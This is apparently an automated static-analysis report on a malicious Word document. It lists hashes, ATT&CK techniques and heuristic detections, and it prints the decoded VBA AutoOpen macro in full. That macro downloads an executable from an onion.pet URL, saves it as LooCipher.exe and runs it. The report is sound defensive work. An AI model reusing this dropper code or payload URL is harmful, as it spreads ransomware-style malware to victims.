Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ff24d9575694ae2a…

MALICIOUS

Office (OOXML)

21.9 KB Created: 2019-06-17 07:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-06-27
MD5: ee2d98d06aed433500a2e69321639425 SHA-1: 5195ac5f8983115154939aacfa5eb4a9dd7dfb2b SHA-256: ff24d9575694ae2a1e6a6101a2dbaa95dd1ab31b44a3931f6d6a62bbf5be2cbd
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample is an Office document containing VBA macros. The AutoOpen macro is designed to download a second-stage executable from the URL "http://hcwyo5rfapkytajg.onion.pet/3agpke31mk.exe", save it as "LooCipher.exe", and then execute it. The document also contains a lure instructing the user to enable macros, which is a common tactic for malware droppers.

Heuristics 8

  • ClamAV: Doc.Macro.Downloader-6360614-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Downloader-6360614-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("LooCipher.exe")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     .write xHttp.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://hcwyo5rfapkytajg.onion.pet/3agpke31mk.exe Referenced by macro
    • http://hcwyo5rfapkytajg.onion.pet/3agpke31mk.exe�Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 670 bytes
SHA-256: 31007e9435b026a53cacea26bb4b3306fbd95b0cbe46a1c1965e591895437a9e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://hcwyo5rfapkytajg.onion.pet/3agpke31mk.exe", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "LooCipher.exe", 2 '//overwrite
End With

Shell ("LooCipher.exe")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 13312 bytes
SHA-256: 832cef59530035b80f0ff710830668ca72ebd67afff68b6b90d2943fe9649f19
Detection
ClamAV: Doc.Macro.Downloader-6360614-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.